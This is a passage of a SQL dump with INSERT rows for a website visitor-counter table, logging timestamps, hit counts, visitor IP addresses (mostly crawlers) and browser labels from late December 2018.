362348,1546239100,1,1,0,0,'141.8.183.22','other'),(362349,1546239114,4,4,0,0,'216.244.66.241','other'),(362350,1546239386,1,1,0,0,'95.108.213.4','other'),(362351,1546239671,2,2,0,0,'54.36.148.216','other'),(362352,1546239877,1,1,0,0,'54.36.149.32','other'),(362353,1546239883,1,1,0,0,'66.249.66.156','chrome'),(362354,1546240015,2,2,0,0,'216.244.66.241','other'),(362355,1546240080,1,1,0,0,'95.163.255.164','other'),(362356,1546240083,1,1,0,0,'95.163.255.156','other'),(362357,1546240403,1,1,0,0,'46.229.168.154','other'),(362358,1546240405,1,1,0,0,'46.229.168.140','other'),(362359,1546240617,1,1,0,0,'95.108.213.4','other'),(362360,1546240654,1,1,0,0,'46.229.168.130','other'),(362361,1546240684,1,1,0,0,'54.36.148.159','other'),(362362,1546240695,1,1,0,0,'54.36.149.68','other'),(362363,1546240884,1,1,0,0,'54.36.148.57','other'),(362364,1546241221,1,1,0,0,'157.55.39.71','other'),(362365,1546241255,1,1,0,0,'54.36.148.69','other'),(362366,1546241270,1,1,0,0,'54.36.149.55','other'),(362367,1546241372,1,1,0,0,'5.45.207.19','other'),(362368,1546241509,1,1,0,0,'54.36.148.209','other'),(362369,1546241734,1,1,0,0,'54.36.148.111','other'),(362370,1546242059,1,1,0,0,'46.229.168.147','other'),(362371,1546242101,1,1,0,0,'54.36.148.144','other'),(362372,1546242115,3,3,0,0,'216.244.66.241','other'),(362373,1546242167,2,2,0,0,'91.196.178.130','firefox'),(362374,1546242379,1,1,0,0,'54.36.148.227','other'),(362375,1546242393,1,1,0,0,'54.36.148.135','other'),(362376,1546242434,1,1,0,0,'54.36.148.239','other'),(362377,1546243175,1,1,0,0,'54.36.148.213','other'),(362378,1546243304,2,2,0,0,'207.46.13.83','other'),(362379,1546243354,2,2,0,0,'216.244.66.241','other'),(362380,1546243581,1,1,0,0,'178.154.244.11','other'),(362381,1546243858,1,1,0,0,'40.77.167.40','other'),(362382,1546244058,1,1,0,0,'54.36.149.40','other'),(362383,1546244107,1,1,0,0,'54.36.149.48','other'),(362384,1546244131,1,1,0,0,'66.249.66.156','chrome'),(362385,1546244132,1,1,0,0,'66.249.66.154','chrome'),(362386,1546244271,1,1,0,0,'54.36.148.102','other'),(362387,1546244273,1,1,0,0,'46.229.168.148','other'),(362388,1546244288,1,1,0,0,'54.36.148.142','other'),(362389,1546244883,1,1,0,0,'46.229.168.149','other'),(362390,1546244937,9,9,0,0,'216.244.66.241','other'),(362391,1546245112,1,1,0,0,'87.250.224.64','other'),(362392,1546245200,1,1,0,0,'54.36.148.181','other'),(362393,1546245777,1,1,0,0,'46.229.168.142','other'),(362394,1546245901,1,1,0,0,'54.36.148.31','other'),(362395,1546245964,1,1,0,0,'54.36.149.55','other'),(362396,1546246253,1,1,0,0,'54.36.148.155','other'),(362397,1546246301,1,1,0,0,'54.36.148.28','other'),(362398,1546246330,1,1,0,0,'40.77.167.40','other'),(362399,1546246335,2,2,0,0,'216.244.66.241','other'),(362400,1546246602,1,1,0,0,'66.249.66.156','chrome'),(362401,1546246630,1,1,0,0,'54.36.148.243','other'),(362402,1546246749,2,2,0,0,'95.163.255.94','other'),(362403,1546246970,1,1,0,0,'54.36.149.20','other'),(362404,1546247035,2,2,0,0,'95.163.255.98','other'),(362405,1546247061,2,2,0,0,'46.211.26.141','chrome'),(362406,1546247137,1,1,0,0,'8.29.198.26','other'),(362407,1546247204,1,1,0,0,'54.36.148.151','other'),(362408,1546247293,6,6,0,0,'5.45.207.79','other'),(362409,1546247312,1,1,0,0,'54.36.149.7','other'),(362410,1546247461,5,5,0,0,'178.154.244.11','other'),(362411,1546247617,4,4,0,0,'5.45.207.19','other'),(362412,1546247678,2,2,0,0,'141.8.142.103','other'),(362413,1546247706,1,1,0,0,'87.250.224.47','other'),(362414,1546247826,1,1,0,0,'54.36.148.77','other'),(362415,1546247952,7,7,0,0,'216.244.66.241','other'),(362416,1546248049,1,1,0,0,'8.29.198.25','other'),(362417,1546248053,1,1,0,0,'54.36.149.15','other'),(362418,1546248119,6,6,0,0,'188.166.116.151','chrome'),(362419,1546248242,2,2,0,0,'5.45.207.79','other'),(362420,1546248326,1,1,0,0,'54.36.149.0','other'),(362421,1546248336,1,1,0,0,'54.36.148.16','other'),(362422,1546248388,1,1,0,0,'54.36.148.181','other'),(362423,1546248404,1,1,0,0,'54.36.148.226','other'),(362424,1546248452,3,3,0,0,'178.154.244.11','other'),(362425,1546248691,1,1,0,0,'87.250.224.47','other'),(362426,1546248733,1,1,0,0,'180.76.15.158','other'),(362427,1546248898,1,1,0,0,'54.36.148.212','other'),(362428,1546249272,1,1,0,0,'54.36.149.90','other'),(362429,1546249428,1,1,0,0,'46.229.168.134','other'),(362430,1546249431,1,1,0,0,'54.36.148.136','other'),(362431,1546249469,1,1,0,0,'40.77.167.12','other'),(362432,1546249484,1,1,0,0,'5.45.207.19','other'),(362433,1546249501,1,1,0,0,'54.36.149.74','other'),(362434,1546249522,1,1,0,0,'5.45.207.79','other'),(362435,1546249733,1,1,0,0,'178.154.244.11','other'),(362436,1546250021,1,1,0,0,'46.229.168.136','other'),(362437,1546250022,1,1,0,0,'54.36.148.212','other'),(362438,1546250347,1,1,0,0,'54.36.148.204','other'),(362439,1546250733,1,1,0,0,'180.76.15.140','other'),(362440,1546250734,1,1,0,0,'180.76.15.134','other'),(362441,1546250740,1,1,0,0,'54.36.148.106','other'),(362442,1546250833,8,8,0,0,'216.244.66.241','other'),(362443,1546250943,1,1,0,0,'54.36.148.105','other'),(362444,1546251070,1,1,0,0,'54.36.148.251','other'),(362445,1546251799,1,1,0,0,'106.38.241.190','other'),(362446,1546251910,1,1,0,0,'46.229.168.141','other'),(362447,1546252497,1,1,0,0,'178.154.244.11','other'),(362448,1546252789,1,1,0,0,'40.77.167.40','other'),(362449,1546252898,1,1,0,0,'54.36.149.55','other'),(362450,1546252999,1,1,0,0,'54.36.149.60','other'),(362451,1546253029,1,1,0,0,'54.36.148.209','other'),(362452,1546253054,1,1,0,0,'46.229.168.152','other'),(362453,1546253074,1,1,0,0,'54.36.148.133','other'),(362454,1546253224,1,1,0,0,'54.36.148.190','other'),(362455,1546253591,1,1,0,0,'46.229.168.140','other'),(362456,1546253726,7,7,0,0,'216.244.66.241','other'),(362457,1546253838,1,1,0,0,'5.45.207.19','other'),(362458,1546253985,1,1,0,0,'46.229.168.146','other'),(362459,1546254131,1,1,0,0,'40.77.167.12','other'),(362460,1546254438,1,1,0,0,'37.145.186.209','msie'),(362461,1546254692,1,1,0,0,'54.36.148.161','other'),(362462,1546254696,1,1,0,0,'216.244.66.241','other'),(362463,1546254745,1,1,0,0,'66.102.9.60','chrome'),(362464,1546255106,1,1,0,0,'54.36.149.7','other'),(362465,1546255415,1,1,0,0,'54.36.148.26','other'),(362466,1546255441,1,1,0,0,'54.36.149.88','other'),(362467,1546255471,1,1,0,0,'66.249.66.44','chrome'),(362468,1546255478,1,1,0,0,'54.36.149.41','other'),(362469,1546255669,1,1,0,0,'54.36.149.48','other'),(362470,1546255792,1,1,0,0,'54.36.148.226','other'),(362471,1546256044,1,1,0,0,'54.36.148.161','other'),(362472,1546256164,1,1,0,0,'54.36.148.138','other'),(362473,1546256252,1,1,0,0,'66.249.66.157','chrome'),(362475,1546256432,1,1,0,0,'37.9.113.20','other'),(362476,1546256480,1,1,0,0,'46.229.168.147','other'),(362477,1546256485,2,2,0,0,'5.45.207.19','other'),(362478,1546256488,1,1,0,0,'54.36.149.51','other'),(362479,1546256670,5,5,0,0,'216.244.66.241','other'),(362480,1546256857,2,2,0,0,'40.77.167.40','other'),(362481,1546257040,1,1,0,0,'66.249.66.155','chrome'),(362482,1546257041,1,1,0,0,'66.249.66.152','chrome'),(362483,1546257072,1,1,0,0,'141.8.183.22','other'),(362484,1546257251,1,1,0,0,'141.8.142.103','other'),(362485,1546257434,2,2,0,0,'5.45.207.79','other'),(362486,1546257847,1,1,0,0,'95.163.255.165','other'),(362487,1546257850,1,1,0,0,'95.163.255.161','other'),(362488,1546257866,1,1,0,0,'178.154.244.11','other'),(362489,1546257873,1,1,0,0,'5.45.207.19','other'),(362490,1546257877,2,2,0,0,'37.54.114.236','chrome'),(362491,1546257880,1,1,0,0,'95.163.255.189','other'),(362492,1546257884,1,1,0,0,'95.163.255.186','other'),(362493,1546257962,1,1,0,0,'8.29.198.27','other'),(362494,1546257988,1,1,0,0,'87.250.224.47','other'),(362495,1546258065,6,6,0,0,'66.249.66.156','chrome'),(362496,1546258102,3,3,0,0,'66.249.66.155','chrome'),(362497,1546258305,1,1,0,0,'54.36.149.60','other'),(362498,1546258625,3,3,0,0,'66.249.66.152','chrome'),(362499,1546258720,1,1,0,0,'216.244.66.241','other'),(362500,1546258824,1,1,0,0,'178.154.244.11','other'),(362501,1546258896,1,1,0,0,'8.29.198.27','other'),(362502,1546258931,1,1,0,0,'5.45.207.79','other'),(362503,1546258932,1,1,0,0,'5.45.207.19','other'),(362504,1546259033,1,1,0,0,'54.36.148.227','other'),(362505,1546259417,1,1,0,0,'54.36.148.76','other'),(362506,1546259445,2,2,0,0,'66.249.66.156','chrome'),(362507,1546259607,1,1,0,0,'95.108.213.4','other'),(362508,1546259637,5,5,0,0,'216.244.66.241','other'),(362509,1546260019,1,1,0,0,'46.229.168.139','other'),(362510,1546260115,2,2,0,0,'46.229.168.147','other'),(362511,1546260414,1,1,0,0,'54.36.148.250','other'),(362512,1546260468,1,1,0,0,'66.249.66.155','chrome'),(362513,1546260469,1,1,0,0,'66.249.66.152','chrome'),(362514,1546260754,1,1,0,0,'54.36.148.197','other'),(362515,1546261182,1,1,0,0,'66.249.66.157','chrome'),(362516,1546261183,1,1,0,0,'66.249.66.156','chrome'),(362517,1546261551,1,1,0,0,'54.36.148.129','other'),(362518,1546261613,1,1,0,0,'54.36.148.139','other'),(362519,1546262104,1,1,0,0,'54.36.149.88','other'),(362520,1546262198,1,1,0,0,'54.36.149.16','other'),(362521,1546262257,1,1,0,0,'207.46.13.206','other'),(362522,1546262403,1,1,0,0,'95.163.255.159','other'),(362523,1546262405,1,1,0,0,'95.163.255.162','other'),(362524,1546262490,8,8,0,0,'216.244.66.241','other'),(362525,1546262623,1,1,0,0,'54.36.148.80','other'),(362526,1546262848,1,1,0,0,'54.36.149.66','other'),(362527,1546262994,1,1,0,0,'54.36.149.12','other'),(362528,1546263355,1,1,0,0,'54.36.148.145','other'),(362529,1546263513,1,1,0,0,'95.163.255.181','other'),(362530,1546263516,1,1,0,0,'95.163.255.170','other'),(362531,1546263653,1,1,0,0,'54.36.148.253','other'),(362532,1546263683,1,1,0,0,'54.36.148.186','other'),(362533,1546263739,1,1,0,0,'66.249.66.57','chrome'),(362535,1546263796,1,1,0,0,'66.249.66.44','chrome'),(362536,1546264026,1,1,0,0,'178.154.244.11','other'),(362537,1546264216,2,2,0,0,'46.211.24.239','chrome'),(362538,1546264255,1,1,0,0,'54.36.148.212','other'),(362539,1546264438,1,1,0,0,'54.36.148.135','other'),(362540,1546264460,1,1,0,0,'54.36.148.39','other'),(362541,1546264718,1,1,0,0,'54.36.148.111','other'),(362542,1546264919,1,1,0,0,'54.36.148.177','other'),(362543,1546265027,1,1,0,0,'66.249.66.40','chrome'),(362544,1546265115,1,1,0,0,'54.36.148.94','other'),(362545,1546265386,3,3,0,0,'216.244.66.241','other'),(362546,1546265450,1,1,0,0,'54.36.148.128','other'),(362547,1546265492,1,1,0,0,'180.76.15.6','other'),(362548,1546265792,2,2,0,0,'5.45.207.19','other'),(362549,1546265885,1,1,0,0,'66.249.66.155','chrome'),(362550,1546265886,1,1,0,0,'66.249.66.156','chrome'),(362551,1546265998,1,1,0,0,'46.229.168.154','other'),(362552,1546265999,1,1,0,0,'46.229.168.132','other'),(362553,1546266173,1,1,0,0,'87.250.224.65','other'),(362554,1546266369,1,1,0,0,'216.244.66.241','other'),(362555,1546266458,1,1,0,0,'178.154.244.11','other'),(362556,1546266607,1,1,0,0,'66.249.66.154','chrome'),(362557,1546266898,1,1,0,0,'54.36.148.110','other'),(362558,1546267035,1,1,0,0,'54.36.148.156','other'),(362559,1546267141,1,1,0,0,'91.196.178.70','firefox'),(362560,1546267303,3,3,0,0,'141.8.142.103','other'),(362561,1546267324,1,1,0,0,'54.36.148.47','other'),(362562,1546267450,1,1,0,0,'95.108.213.4','other'),(362563,1546267621,2,2,0,0,'87.250.224.47','other'),(362564,1546267697,4,4,0,0,'178.154.244.11','other'),(362565,1546267700,1,0,1,0,'66.249.66.156',''),(362566,1546267701,1,0,1,0,'66.249.66.152',''),(362567,1546267861,1,1,0,0,'37.9.113.148','other'),(362568,1546267931,1,1,0,0,'54.36.148.248','other'),(362569,1546267962,3,3,0,0,'5.45.207.79','other'),(362570,1546268096,1,1,0,0,'141.8.142.65','other'),(362571,1546268100,6,6,0,0,'5.45.207.19','other'),(362572,1546268107,1,1,0,0,'213.180.203.9','other'),(362573,1546268110,1,1,0,0,'66.249.66.59','chrome'),(362575,1546268122,1,1,0,0,'141.8.183.22','other'),(362576,1546268164,1,1,0,0,'54.36.148.251','other'),(362577,1546268178,6,6,0,0,'216.244.66.241','other'),(362578,1546268185,1,1,0,0,'87.250.224.65','other'),(362579,1546268282,1,1,0,0,'54.36.148.122','other'),(362580,1546268292,1,1,0,0,'54.36.148.114','other'),(362581,1546268389,1,1,0,0,'95.163.255.151','other'),(362582,1546268392,1,1,0,0,'95.163.255.172','other'),(362583,1546268469,3,3,0,0,'141.8.142.103','other'),(362584,1546268753,1,1,0,0,'66.249.66.57','chrome'),(362586,1546268823,1,1,0,0,'8.29.198.25','other'),(362587,1546268930,1,1,0,0,'54.36.149.67','other'),(362588,1546268992,2,2,0,0,'178.154.244.11','other'),(362589,1546269112,3,3,0,0,'5.45.207.79','other'),(362590,1546269131,1,1,0,0,'5.45.207.19','other'),(362591,1546269195,2,2,0,0,'46.211.24.239','chrome'),(362592,1546269247,1,1,0,0,'54.36.148.243','other'),(362593,1546269563,1,1,0,0,'54.36.149.75','other'),(362594,1546269624,4,4,0,0,'95.163.255.108','other'),(362595,1546269631,3,3,0,0,'95.163.255.112','other'),(362596,1546269641,1,1,0,0,'95.163.255.119','other'),(362597,1546269651,1,1,0,0,'95.163.255.117','other'),(362598,1546269664,1,1,0,0,'54.36.148.96','other'),(362599,1546269668,3,3,0,0,'95.163.255.116','other'),(362600,1546269692,2,2,0,0,'95.163.255.114','other'),(362601,1546269719,2,2,0,0,'66.249.66.157','chrome'),(362603,1546269731,1,1,0,0,'95.163.255.115','other'),(362604,1546269738,1,1,0,0,'8.29.198.27','other'),(362605,1546269753,3,3,0,0,'216.244.66.241','other'),(362606,1546269758,1,1,0,0,'95.163.255.107','other'),(362607,1546269787,1,1,0,0,'54.36.149.23','other'),(362608,1546269797,1,1,0,0,'54.36.148.247','other'),(362609,1546269807,1,1,0,0,'95.163.255.106','other'),(362610,1546269839,1,1,0,0,'95.163.255.104','other'),(362611,1546269872,1,1,0,0,'95.163.255.109','other'),(362612,1546269880,1,1,0,0,'54.36.148.62','other'),(362613,1546269975,1,1,0,0,'54.36.149.32','other'),(362614,1546269983,1,1,0,0,'141.8.142.103','other'),(362615,1546270082,1,1,0,0,'66.249.66.152','chrome'),(362616,1546270316,1,1,0,0,'46.229.168.136','other'),(362617,1546270317,1,1,0,0,'46.229.168.148','other'),(362618,1546270768,2,2,0,0,'66.249.66.42','chrome'),(362619,1546270777,1,1,0,0,'54.36.148.191','other'),(362620,1546270889,1,1,0,0,'54.36.148.163','other'),(362621,1546271133,2,2,0,0,'5.45.207.19','other'),(362622,1546271177,2,2,0,0,'91.196.178.181','chrome'),(362623,1546271196,6,6,0,0,'216.244.66.241','other'),(362624,1546271280,3,3,0,0,'178.154.244.11','other'),(362625,1546271412,1,1,0,0,'46.229.168.139','other'),(362626,1546271414,1,1,0,0,'46.229.168.142','other'),(362627,1546271544,1,1,0,0,'54.36.148.136','other'),(362628,1546271630,1,1,0,0,'66.249.66.44','chrome'),(362629,1546271676,1,1,0,0,'54.36.148.111','other'),(362630,1546271701,1,1,0,0,'54.36.148.119','other'),(362631,1546271748,1,1,0,0,'54.36.149.106','other'),(362632,1546271758,1,1,0,0,'54.36.148.88','other'),(362633,1546272019,1,1,0,0,'54.36.148.69','other'),(362634,1546272448,1,1,0,0,'207.46.13.184','other'),(362635,1546272492,2,2,0,0,'66.249.66.156','chrome'),(362636,1546272506,1,1,0,0,'54.36.149.52','other'),(362637,1546272534,1,1,0,0,'54.36.148.34','other'),(362638,1546272583,1,1,0,0,'54.36.148.156','other'),(362639,1546273019,1,1,0,0,'207.46.13.206','other'),(362640,1546273075,2,2,0,0,'188.113.25.140','chrome'),(362641,1546273227,2,2,0,0,'66.249.66.40','chrome'),(362642,1546273295,2,2,0,0,'54.36.148.90','other'),(362643,1546273305,1,1,0,0,'54.36.148.243','other'),(362644,1546273471,1,1,0,0,'54.36.149.10','other'),(362645,1546273481,1,1,0,0,'54.36.148.101','other'),(362646,1546274043,1,1,0,0,'66.249.66.152','chrome'),(362647,1546274110,4,4,0,0,'216.244.66.241','other'),(362648,1546274113,1,1,0,0,'46.229.168.149','other'),(362649,1546274615,2,2,0,0,'66.249.66.157','chrome'),(362650,1546274620,2,2,0,0,'66.249.66.154','chrome'),(362651,1546274773,1,1,0,0,'13.66.139.0','other'),(362652,1546274774,1,1,0,0,'46.229.168.152','other'),(362653,1546274778,1,1,0,0,'54.36.149.83','other'),(362654,1546274846,1,1,0,0,'54.36.148.215','other'),(362655,1546274927,1,1,0,0,'54.36.148.36','other'),(362656,1546274954,1,1,0,0,'66.249.66.155','chrome'),(362657,1546275087,1,1,0,0,'54.36.148.40','other'),(362658,1546275241,1,1,0,0,'46.229.168.153','other'),(362659,1546275511,1,1,0,0,'66.249.66.156','chrome'),(362660,1546275741,2,2,0,0,'91.196.178.169','other'),(362661,1546275913,1,1,0,0,'54.36.148.162','other'),(362662,1546275981,1,1,0,0,'207.46.13.206','other'),(362663,1546276049,1,1,0,0,'178.154.244.11','other'),(362664,1546276062,1,1,0,0,'66.249.66.155','chrome'),(362665,1546276063,1,1,0,0,'66.249.66.154','chrome'),(362666,1546276423,1,1,0,0,'54.36.148.79','other'),(362667,1546276583,1,1,0,0,'54.36.149.12','other'),(362668,1546276673,1,1,0,0,'66.249.66.59','chrome'),(362669,1546276674,1,1,0,0,'66.249.66.44','chrome'),(362670,1546276675,1,1,0,0,'54.36.148.29','other'),(362671,1546276773,1,1,0,0,'54.36.148.200','other'),(362672,1546276779,7,7,0,0,'216.244.66.241','other'),(362673,1546276783,1,1,0,0,'54.36.148.98','other'),(362674,1546276883,1,1,0,0,'54.36.149.13','other'),(362675,1546277045,2,2,0,0,'37.9.113.148','other'),(362676,1546277052,2,2,0,0,'207.46.13.83','other'),(362677,1546277061,1,1,0,0,'180.76.15.30','other'),(362678,1546277064,1,1,0,0,'54.36.148.218','other'),(362679,1546277137,2,2,0,0,'5.45.207.19','other'),(362680,1546277183,3,3,0,0,'5.45.207.79','other'),(362681,1546277214,4,4,0,0,'178.154.244.11','other'),(362682,1546277281,1,1,0,0,'141.8.142.103','other'),(362683,1546277379,1,1,0,0,'54.36.148.33','other'),(362684,1546277525,1,1,0,0,'141.8.142.108','other'),(362685,1546277797,1,1,0,0,'95.108.213.4','other'),(362686,1546277808,1,1,0,0,'54.36.148.231','other'),(362687,1546277974,2,2,0,0,'46.229.168.147','other'),(362688,1546277987,4,4,0,0,'216.244.66.241','other'),(362689,1546278001,1,1,0,0,'46.229.168.141','other'),(362690,1546278154,1,1,0,0,'54.36.148.110','other'),(362691,1546278191,2,2,0,0,'5.45.207.79','other'),(362692,1546278245,1,1,0,0,'54.36.149.55','other'),(362693,1546278320,1,1,0,0,'66.249.66.42','chrome'),(362694,1546278402,2,2,0,0,'178.154.244.11','other'),(362695,1546278561,1,1,0,0,'54.36.148.26','other'),(362696,1546278591,1,1,0,0,'54.36.148.63','other'),(362697,1546278596,1,1,0,0,'46.229.168.150','other'),(362698,1546278815,1,1,0,0,'66.249.66.152','chrome'),(362699,1546278833,2,2,0,0,'141.8.142.103','other'),(362700,1546278872,6,6,0,0,'5.45.207.19','other'),(362701,1546279103,1,1,0,0,'5.45.207.79','other'),(362702,1546279107,1,1,0,0,'95.163.255.168','other'),(362703,1546279110,1,1,0,0,'95.163.255.160','other'),(362704,1546279121,1,1,0,0,'54.36.148.84','other'),(362705,1546279518,1,1,0,0,'54.36.148.115','other'),(362706,1546279653,1,1,0,0,'54.36.148.127','other'),(362707,1546279659,1,1,0,0,'8.29.198.25','other'),(362708,1546279682,1,1,0,0,'54.36.148.46','other'),(362709,1546279693,1,1,0,0,'95.163.255.150','other'),(362710,1546279696,2,2,0,0,'95.163.255.170','other'),(362711,1546279715,1,1,0,0,'54.36.149.69','other'),(362712,1546279768,3,3,0,0,'216.244.66.241','other'),(362713,1546279848,1,1,0,0,'66.249.66.152','chrome'),(362714,1546280064,1,1,0,0,'54.36.148.27','other'),(362715,1546280094,1,1,0,0,'95.163.255.181','other'),(362716,1546280096,1,1,0,0,'95.163.255.182','other'),(362717,1546280097,1,1,0,0,'95.163.255.155','other'),(362718,1546280102,1,1,0,0,'95.163.255.154','other'),(362719,1546280105,1,1,0,0,'95.163.255.156','other'),(362720,1546280355,1,1,0,0,'46.229.168.130','other'),(362721,1546280365,1,1,0,0,'54.36.149.68','other'),(362722,1546280431,1,1,0,0,'46.229.168.140','other'),(362723,1546280470,1,1,0,0,'54.36.148.239','other'),(362724,1546280525,1,1,0,0,'66.249.66.156','chrome'),(362725,1546280563,1,1,0,0,'8.29.198.27','other'),(362726,1546280735,1,1,0,0,'216.244.66.241','other'),(362727,1546280771,1,1,0,0,'54.36.148.63','other'),(362728,1546280778,1,1,0,0,'46.229.168.132','other'),(362729,1546280975,1,1,0,0,'54.36.149.32','other'),(362730,1546280986,1,1,0,0,'46.229.168.148','other'),(362731,1546280987,1,1,0,0,'54.36.148.150','other'),(362732,1546281010,1,1,0,0,'46.229.168.146','other'),(362733,1546281092,1,1,0,0,'54.36.149.66','other'),(362734,1546281330,1,1,0,0,'54.36.148.98','other'),(362735,1546281389,1,1,0,0,'54.36.149.65','other'),(362736,1546281491,3,3,0,0,'46.211.25.43','chrome'),(362737,1546281518,1,1,0,0,'54.36.148.209','other'),(362738,1546281532,1,1,0,0,'54.36.148.160','other'),(362739,1546281598,1,1,0,0,'40.77.167.12','other'),(362740,1546281672,1,1,0,0,'54.36.149.27','other'),(362741,1546281703,1,1,0,0,'54.36.148.181','other'),(362742,1546281719,1,1,0,0,'54.36.148.163','other'),(362743,1546281791,1,1,0,0,'54.36.148.220','other'),(362744,1546281982,1,1,0,0,'54.36.148.127','other'),(362745,1546282131,1,1,0,0,'207.46.13.71','other'),(362746,1546282186,1,1,0,0,'46.229.168.140','other'),(362747,1546282399,1,1,0,0,'54.36.149.94','other'),(362748,1546282627,1,1,0,0,'207.46.13.206','other'),(362749,1546282634,6,6,0,0,'216.244.66.241','other'),(362750,1546282688,1,1,0,0,'66.249.66.155','chrome'),(362751,1546282693,1,1,0,0,'66.249.66.156','chrome'),(362752,1546282726,1,1,0,0,'54.36.148.132','other'),(362753,1546282779,1,1,0,0,'66.102.9.38','chrome'),(362754,1546282781,1,1,0,0,'46.211.111.36','chrome'),(362755,1546283296,1,1,0,0,'54.36.148.129','other'),(362756,1546283633,2,2,0,0,'5.45.207.19','other'),(362757,1546283671,1,1,0,0,'54.36.148.112','other'),(362758,1546283806,1,1,0,0,'95.24.22.180','msie'),(362759,1546284141,1,1,0,0,'54.36.149.34','other'),(362760,1546284378,1,1,0,0,'46.229.168.136','other'),(362761,1546284397,1,1,0,0,'216.244.66.241','other'),(362762,1546284479,1,1,0,0,'5.45.207.79','other'),(362763,1546284526,1,1,0,0,'54.36.148.69','other'),(362764,1546284667,1,1,0,0,'95.163.255.184','other'),(362765,1546284670,1,1,0,0,'95.163.255.163','other'),(362766,1546284721,1,1,0,0,'5.45.207.19','other'),(362767,1546284868,1,1,0,0,'46.229.168.137','other'),(362768,1546285043,1,1,0,0,'54.36.148.222','other'),(362769,1546285462,5,5,0,0,'216.244.66.241','other'),(362770,1546285885,1,1,0,0,'37.53.224.252','chrome'),(362771,1546286164,1,1,0,0,'46.229.168.149','other'),(362772,1546286288,1,1,0,0,'13.66.139.0','other'),(362773,1546286397,1,1,0,0,'54.36.148.234','other'),(362774,1546286906,1,1,0,0,'107.178.33.25','chrome'),(362775,1546286995,1,1,0,0,'54.36.148.114','other'),(362776,1546287149,1,1,0,0,'54.36.148.32','other'),(362777,1546287192,2,2,0,0,'66.249.66.155','chrome'),(362778,1546287194,1,1,0,0,'66.249.66.152','chrome'),(362779,1546287281,1,1,0,0,'54.36.148.211','other'),(362780,1546287330,1,1,0,0,'54.36.148.208','other'),(362781,1546287332,1,1,0,0,'54.36.148.227','other'),(362782,1546287341,1,1,0,0,'54.36.148.54','other'),(362783,1546287357,1,1,0,0,'54.36.148.130','other'),(362784,1546287429,2,2,0,0,'5.45.207.79','other'),(362785,1546287603,1,1,0,0,'95.108.213.50','other'),(362786,1546287638,1,1,0,0,'87.250.224.65','other'),(362787,1546287736,3,3,0,0,'178.154.244.11','other'),(362788,1546287802,8,8,0,0,'5.45.207.19','other'),(362789,1546287990,4,4,0,0,'141.8.142.103','other'),(362790,1546288184,1,1,0,0,'46.229.168.154','other'),(362791,1546288256,1,1,0,0,'54.36.148.102','other'),(362792,1546288328,4,4,0,0,'216.244.66.241','other'),(362793,1546288366,7,7,0,0,'5.45.207.79','other'),(362794,1546288713,2,2,0,0,'5.45.207.19','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (362795,1546288756,1,1,0,0,'54.36.148.182','other'),(362796,1546288812,1,1,0,0,'87.250.224.47','other'),(362797,1546288829,1,1,0,0,'66.249.66.42','chrome'),(362798,1546288858,1,1,0,0,'66.249.66.57','chrome'),(362799,1546288859,1,1,0,0,'66.249.66.40','chrome'),(362800,1546288935,1,1,0,0,'66.249.66.154','chrome'),(362801,1546288969,1,1,0,0,'66.249.66.152','chrome'),(362802,1546289125,1,1,0,0,'54.36.148.201','other'),(362803,1546289239,1,1,0,0,'46.229.168.150','other'),(362804,1546289255,1,1,0,0,'54.36.148.196','other'),(362805,1546289567,2,2,0,0,'66.249.66.156','chrome'),(362806,1546289612,3,3,0,0,'216.244.66.241','other'),(362807,1546289707,1,1,0,0,'207.46.13.83','other'),(362808,1546289809,3,3,0,0,'46.211.131.238','chrome'),(362809,1546289926,1,1,0,0,'66.249.66.152','chrome'),(362810,1546290126,1,1,0,0,'54.36.148.253','other'),(362811,1546290128,1,1,0,0,'95.163.255.108','other'),(362812,1546290147,1,1,0,0,'178.154.171.27','other'),(362813,1546290236,2,2,0,0,'5.45.207.19','other'),(362814,1546290381,1,1,0,0,'54.36.148.155','other'),(362815,1546290404,1,1,0,0,'54.36.149.31','other'),(362816,1546290493,1,1,0,0,'8.29.198.27','other'),(362817,1546290505,1,1,0,0,'46.229.168.134','other'),(362818,1546290593,1,1,0,0,'95.163.255.104','other'),(362819,1546290705,1,1,0,0,'66.249.66.157','chrome'),(362821,1546291029,1,1,0,0,'54.36.149.73','other'),(362822,1546291077,8,8,0,0,'216.244.66.241','other'),(362823,1546291311,1,1,0,0,'95.163.255.156','other'),(362824,1546291314,1,1,0,0,'95.163.255.195','other'),(362825,1546291344,1,1,0,0,'54.36.148.214','other'),(362826,1546291394,1,1,0,0,'8.29.198.25','other'),(362827,1546291430,1,1,0,0,'40.77.167.109','other'),(362828,1546291477,1,1,0,0,'95.163.255.102','other'),(362829,1546291515,1,1,0,0,'54.36.149.4','other'),(362830,1546291863,1,1,0,0,'46.229.168.143','other'),(362831,1546291998,1,1,0,0,'54.36.148.37','other'),(362832,1546292219,1,1,0,0,'54.36.148.71','other'),(362833,1546292448,1,1,0,0,'92.113.174.207','chrome'),(362834,1546292628,1,1,0,0,'46.229.168.129','other'),(362835,1546292630,1,1,0,0,'46.229.168.132','other'),(362836,1546292779,2,2,0,0,'46.229.168.147','other'),(362837,1546292808,1,1,0,0,'46.229.168.137','other'),(362838,1546292831,1,1,0,0,'54.36.148.195','other'),(362839,1546293307,1,1,0,0,'54.36.148.252','other'),(362840,1546293552,2,2,0,0,'91.196.178.131','chrome'),(362841,1546293555,1,1,0,0,'66.249.66.157','chrome'),(362842,1546293556,1,1,0,0,'66.249.66.152','chrome'),(362843,1546293931,1,1,0,0,'54.36.148.49','other'),(362844,1546293985,4,4,0,0,'216.244.66.241','other'),(362845,1546294276,1,1,0,0,'54.36.148.87','other'),(362846,1546294545,1,1,0,0,'37.73.63.187','chrome'),(362847,1546294618,1,1,0,0,'54.36.149.61','other'),(362848,1546294636,1,1,0,0,'5.45.207.19','other'),(362849,1546294639,1,1,0,0,'5.45.207.79','other'),(362850,1546294884,1,1,0,0,'66.249.66.155','chrome'),(362852,1546294890,2,2,0,0,'157.55.39.115','other'),(362853,1546295371,1,1,0,0,'66.249.66.156','chrome'),(362854,1546295540,1,1,0,0,'54.36.148.154','other'),(362855,1546296088,1,1,0,0,'54.36.148.36','other'),(362856,1546296185,1,1,0,0,'54.36.148.20','other'),(362857,1546296360,1,1,0,0,'95.163.255.195','other'),(362858,1546296363,1,1,0,0,'95.163.255.155','other'),(362859,1546296421,5,5,0,0,'95.163.255.119','other'),(362860,1546296506,1,1,0,0,'5.45.207.19','other'),(362861,1546296686,1,1,0,0,'54.36.148.67','other'),(362862,1546296698,1,1,0,0,'54.36.148.227','other'),(362863,1546296730,1,1,0,0,'66.249.66.44','chrome'),(362864,1546296772,1,1,0,0,'91.196.178.97','chrome'),(362865,1546296841,1,1,0,0,'40.77.1